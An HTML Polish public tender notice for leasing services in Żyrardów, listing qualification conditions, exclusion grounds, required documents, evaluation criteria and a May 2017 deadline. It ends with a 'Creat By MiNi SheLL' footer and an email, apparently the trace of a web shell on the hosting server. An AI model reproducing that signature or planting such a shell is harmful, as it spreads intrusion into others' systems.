W razie konieczności, szczególnie gdy wykazy usług lub dowody potwierdzające czy usługi zostały wykonane należycie budzą wątpliwości Zamawiającego, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były wykonywane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.

Wykonawca, wykazując spełnianie warunków, o których mowa powyżej może polegać na zdolnościach ekonomicznych lub finansowych innych podmiotów lub na osobach zdolnych do wykonania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów w postaci Załącznika nr 8 do SIWZ do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

2. Zamawiający określi, czy Wykonawcy, którzy przez oferowanie wykonania przedmiotu zamówienia, spełniają wymogi określone przez Zamawiającego oraz nie podlegają wykluczeniu z postępowania na podstawie wymaganych przez Zamawiającego dokumentów.
3. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.
4. Wykonawca może w celu potwierdzenia spełniania warunków, o których mowa w pkt. III. 1. 2) i III.1.3)w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia,  polegać na sytuacji ekonomicznej lub finansowej innych podmiotów lub na zdolnościach technicznych lub zawodowych, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
5. Zamawiający jednocześnie informuje, iż stosowna sytuacja  wystąpi wyłącznie w przypadku kiedy:
1) Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów udowodni Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
2) Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału 
w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 1322 i ust. 5.
3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia braku podstaw do wykluczenia, potencjalnie wyłoniony Wykonawca na drodze postępowania przetargowego zostanie wezwany do  przedłożenia następujących dokumentów:

a) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

b) aktualne zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega 
z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 

c) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega 
z opłacaniem podatków - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym 
w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 

d) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13),14) i 21) ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
e) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 5 pkt 5) i 6) ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty, o których mowa w pkt. VIII. 4.3) od a) do e) dla każdego z nich.
Stosownie do treści § 7 ust. 1 Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. (Dz. U. z 2016 r, poz. 1126) w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia: 
1) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu o którym mowa w pkt. III.1.) d) i e), składa informację  z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument w zakresie określonym w art. 24 ust. 1 pkt 13, 14,21 oraz ust. 5. pkt 5 i 6 ustawy Pzp.
2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w pkt III.4)1.a),b),c) składa dokument lub dokumenty, wystawione w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
b)nie otwarto jego likwidacji ani nie ogłoszono upadłości.

Stosownie do treści § 7 ust. 2 powołanego powyżej Rozporządzenia Ministra Rozwoju, dokumenty o których mowa powyżej w pkt. III.4.3) a),d),e) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Natomiast dokumenty, o których mowa powyżej w pkt III.4.1) b) i c) powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Stosownie do treści § 7 ust. 3 powołanego powyżej Rozporządzenia Prezesa Rady Ministrów, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej w pkt. III.1.a)-e), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. 
A ponadto:
Pełnomocnictwo osoby reprezentującej wspólnie działających Wykonawców, określające postępowanie do którego się odnosi, precyzujące zakres umocowania oraz określające osobę pełnomocnika i Wykonawców udzielających pełnomocnictwa. Pełnomocnictwo winno być podpisane przez wszystkich Wykonawców. 

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykonawca musi spełniać warunek posiadania środków finansowych lub zdolności kredytowej w wysokości co najmniej 2 000 000,00 zł (słownie: dwa miliony złotych). 
W celu potwierdzenia spełniania warunku, o którym mowa w pkt. VI.1.2)b), Wykonawca (ten z Wykonawców składających ofertę wspólną, który będzie potwierdzał spełnianie tego warunku), zobowiązany jest przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert.
Posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia w wysokości co najmniej 1 500 000,00 zł.
W celu potwierdzenia spełniania warunku, o którym mowa powyżej Wykonawca (ten z Wykonawców składających ofertę wspólną, który będzie potwierdzał spełnianie tego warunku), zobowiązany jest przedłożyć dokument, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wymaganej kwocie.
Wykonawca, wykazując spełnianie warunków, o których mowa powyżej może polegać na zdolnościach ekonomicznych lub finansowych innych podmiotów lub na osobach zdolnych do wykonania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Załącznik nr 1 do SIWZ- Formularz ofertowy, Załącznik nr 2  Wykaz wykonanych usług leasingu, Załącznik nr 3  Oświadczenie o braku podstaw do wykluczenia i spełnienia warunków udziału w postępowaniu, Załącznik nr 4  Wzór listy  podmiotów należących do tej samej grupy kapitałowej.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60</td></tr><tr><td>Terin dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
 zmiany będące następstwem działania organów administracji, przepisów prawa w szczególności: a) zmiana stawki podatku VAT.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Ofertę należy złożyć w siedzibie Zamawiającego przy ul. Czystej 5 w Żyrardowie- pok. 100. 2. Termin składania ofert upływa dnia  12.05.2017 r., godz. 10:00. 3.Oferty otrzymane przez Zamawiającego po terminie zostaną zwrócone Wykonawcy.4. Otwarcie ofert nastąpi w siedzibie Zamawiającego przy ul. Czystej 5 w Żyrardowie- pok.4 w dniu 12.05.2017 r. godz. 10:30.</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com